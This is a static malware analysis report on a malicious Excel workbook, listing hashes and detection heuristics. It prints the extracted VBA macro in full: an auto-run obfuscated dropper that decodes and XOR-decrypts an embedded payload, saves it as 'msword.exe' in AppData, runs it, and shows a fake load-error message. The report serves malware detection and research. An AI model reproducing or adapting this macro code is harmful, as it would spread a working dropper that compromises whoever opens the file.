Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0a6c141b7ee19200…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 6.24 MB
Created: 2020-11-12 14:41:42 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2020-12-25
MD5: 08ca8cdeadbc036985a6ee48e60690c1
SHA-1: dc4c57a61545249ae95f615bdeb096712570f48b
SHA-256: 0a6c141b7ee1920087dff8e6d1e845e268eca5405386df638cf855997272c71b
Risk score: 118

Heuristics (6)

  • VBA project inside OOXML [severity: medium, rule: OOXML_VBA, 4 related findings]
    Document contains a VBA project — VBA macros present
  • CreateObject call [severity: high, rule: OLE_VBA_CREATEOBJ]
    Matched line in script:
    Set objFSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens [severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [severity: low, rule: OLE_VBA_WBOPEN]
    Matched line in script:
    Private Sub Workbook_Open()
  • Environ() call (env variable access) [severity: low, rule: OLE_VBA_ENVIRON]
    Matched line in script:
    Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
  • Suspicious extracted artifact [severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 21287 bytes
SHA-256: 191bfa73df9dd31fc301859cdf59bd56596ab422eb9b9b0792f675a4acf85ef3

First 1,000 lines of the extracted script:

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call Protected_Images
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "xxx01xxxwxx01"
Attribute VB_Base = "0{5ED72A97-F52B-436C-AF4A-8000206CB120}{3CF44271-25FD-4382-BB70-939011D68F9D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Private Sub twotxt_Change()

End Sub

Private Sub txtVBS_Change()

End Sub

Attribute VB_Name = "xxx01xxxmx01"
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Private Sub dx1x0xnx(ByVal strPath As String)
Dim objFSO As Object

Set objFSO = CreateObject("Scripting.FileSystemObject")
On Error GoTo lblError:

objFSO.deletefile (strPath)

Set objFSO = Nothing
Exit Sub


lblError:
Err.Clear
End Sub


Public Sub xx01x1()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & "\dx10101xxx0x0x")
Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")



Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = xxx01xxxwxx01.jahaenx.Text

Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile nxnxnxnxnx & "\dx10101xxx0x0x"


Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing


End Sub

Public Sub xx01x1x1()
Dim xxx10xxxxxxx, errResult
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx01xx07 As String: xx010xx7 = "G"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010x11 As String: xx010x11 = "K"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"




Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & "\dxdx01dx01dx")

xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&*(K(*&K0^%$W$@!&@#$C%Excel^7&*(K(*&K^%$W@2017!&^%$#lx^&%$""")

errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\dx10101xxx0x0x", nxnxnxnxnx & "\dxdx01dx01dx", xxx10xxxxxxx)
If errResult <> 0 Then
    ShowError errResult
End If
Call dx1x0xnx(nxnxnxnxnx & "\dx10101xxx0x0x")
End Sub

Sub ShowError(myError)
    On Error Resume Next
    Err.Raise myError
    Err.Clear
    On Error GoTo 0
   
End Sub



Function xlxlxlxlxlxlx(myFileIn, myFileOut, arrCode)

    Dim i, objFSO, objFileIn, objFileOut, objStreamIn

    Const ForAppending = 8
    Const ForReading = 1
    Const ForWriting = 2
    Const TristateFalse = 0
    Const TristateMixed = -2
    Const TristateTrue = -1
    Const TristateUseDefault = -2

    
    On Error Resume Next

    
    If Not IsArray(arrCode) Then
        arrCode = Array(arrCode)
    End If

    
    For i = 0 To UBound(arrCode)
        If Not IsNumeric(arrCode(i)) Then
            
            xlxlxlxlxlxlx = 1032
            Exit Function
        End If
        If arrCode(i) < 0 Or arrCode(i) > 255 Then
                xlxlxlxlxlxlx = 1031
            Exit Function
        End If
    Next

    
    Set objFSO = CreateObject("Scripting.FileSystemObject")

   
    If objFSO.FileExists(myFileIn) Then
        Set objFileIn = objFSO.GetFile(myFileIn)
        Set objStreamIn = objFileIn.OpenAsTextStream(ForReading, TristateFalse)
    Else
        
        xlxlxlxlxlxlx = 53
        
        objStreamIn.Close
        Set objStreamIn = Nothing
        Set objFileIn = Nothing
        Set objFSO = Nothing
      
        Exit Function
    End If

  
    If objFSO.FileExists(myFileOut) Then
        
        xlxlxlxlxlxlx = 58
        
        objStreamIn.Close
        Set objStreamIn = Nothing
        Set objFileIn = Nothing
        Set objFSO = Nothing
        
        Exit Function
    Else
        Set objFileOut = objFSO.CreateTextFile(myFileOut, True, False)
    End If
    i = 0
    Do Until objStreamIn.AtEndOfStream
        i = (i + 1) \ (UBound(arrCode) + 1)
        objFileOut.Write Chr(Asc(objStreamIn.Read(1)) Xor arrCode(i))
    Loop

    
    objFileOut.Close
    objStreamIn.Close
    Set objStreamIn = Nothing
    Set objFileIn = Nothing
    Set objFileOut = Nothing
    Set objFSO = Nothing

    
    xlxlxlxlxlxlx = Err.Number

    ' Done
    Err.Clear
    On Error GoTo 0
End Function


Function xxx1010(xexoxlmxxl1)
    Dim i, arrCode()
    ReDim arrCode(Len(xexoxlmxxl1) - 1)
    For i = 0 To UBound(arrCode)
        arrCode(i) = Asc(Mid(xexoxlmxxl1, i + 1, 1))
    Next
    xxx1010 = arrCode
End Function

Public Sub xx01x1x1x()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)

Call dx1x0xnx(nxnxnxnxnx & "\dcxxdcx011xx")

Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\dxdx01dx01dx")
Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII)


Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = objStreamIn.ReadAll()


Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile nxnxnxnxnx & "\dcxxdcx011xx"

Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing

Call dx1x0xnx(nxnxnxnxnx & "\dxdx01dx01dx")
End Sub

Public Sub xx01x1x1x1x()
Dim xxx10xxxxxxx, errResult
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & "\xxddxxddxxdx0x1x")

xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&*(K(*&K0^%$W$@!&@#$C%Excel^7&*(K(*&K^%$W@2017!&^%$#lx^&%$""")

errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\dcxxdcx011xx", nxnxnxnxnx & "\xxddxxddxxdx0x1x", xxx10xxxxxxx)
If errResult <> 0 Then
    ShowError errResult
End If

Call dx1x0xnx(nxnxnxnxnx & "\dcxxdcx011xx")
End Sub

Public Sub xx01x1xx10x()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & "\cxxccxcxc01xx1x0")

Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\xxddxxddxxdx0x1x")
Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII)


Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = objStreamIn.ReadAll()


Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile nxnxnxnxnx & "\cxxccxcxc01xx1x0"


Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing

Call dx1x0xnx(nxnxnxnxnx & "\xxddxxddxxdx0x1x")
End Sub

Public Sub xx1x1x0x01x1()
Dim xxx10xxxxxxx, errResult
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & "\vxxvvxvx0vx1x1x")

xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&*(K(*&K0^%$W$@!&@#$C%Excel^7&*(K(*&K^%$W@2017!&^%$#lx^&%$""")

errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\cxxccxcxc01xx1x0", nxnxnxnxnx & "\vxxvvxvx0vx1x1x", xxx10xxxxxxx)
If errResult <> 0 Then
    ShowError errResult
End If

Call dx1x0xnx(nxnxnxnxnx & "\cxxccxcxc01xx1x0")
End Sub

Public Sub xx1x1x0x101x1()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx0108xx As String: xx0108xx = "S"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx0100cc As String: xx0100cc = "W"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)
Call dx1x0xnx(nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105)
Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\vxxvvxvx0vx1x1x")
Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII)


Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = objStreamIn.ReadAll()


Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105, adSaveCreateOverWrite

Dim xxxxxx: xxxxxx = xx0100cc & xx01005 & xx0108 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2
Set xxxxxx = CreateObject(xx0100cc & xx01005 & xx0103 & xx01004 & xx0109 & xx01002 & xx01006 & xx0100x1 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2)
xxxxxx.Run (Chr(34) & nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105 & Chr(34))

Set objShell = Nothing
Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing

Call dx1x0xnx(nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105)
Call dx1x0xnx(nxnxnxnxnx & "\vxxvvxvx0vx1x1x")
End Sub


Sub xx1x1x0x01x1cx()
 
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"



    Dim fpl As String: fpl = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105
    Call dx1x0xnx(fpl)
    
    
End Sub



Sub xx1x1x0x01x1xx01()
MsgBox "Microsoft Excel - (Failed to load...)"

End Sub
Sub Protected_Images()
Call xx1x1x0x01x1cx
Call xx01x1
Call xx01x1x1
Call xx01x1x1x
Call xx01x1x1x1x
Call xx01x1xx10x
Call xx1x1x0x01x1
Call xx1x1x0x101x1
Sleep 500
Call xx1x1x0x01x1cx
Call xx1x1x0x01x1xx01
Application.Quit
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 8388608 bytes
SHA-256: 7950a739085a14aa0788a2a0e7801c88fc0ab7e993d6a4f667f06224ed84609f

Detection
ClamAV: No threats found
Obfuscation or payload: likely
6899 of 7892 identifiers look randomly generated (e.g. 'AzQZI0YEJRkaCysjAgMEJAsKFHgPBiUnIQQdPy8E'), consistent with name-mangling obfuscation.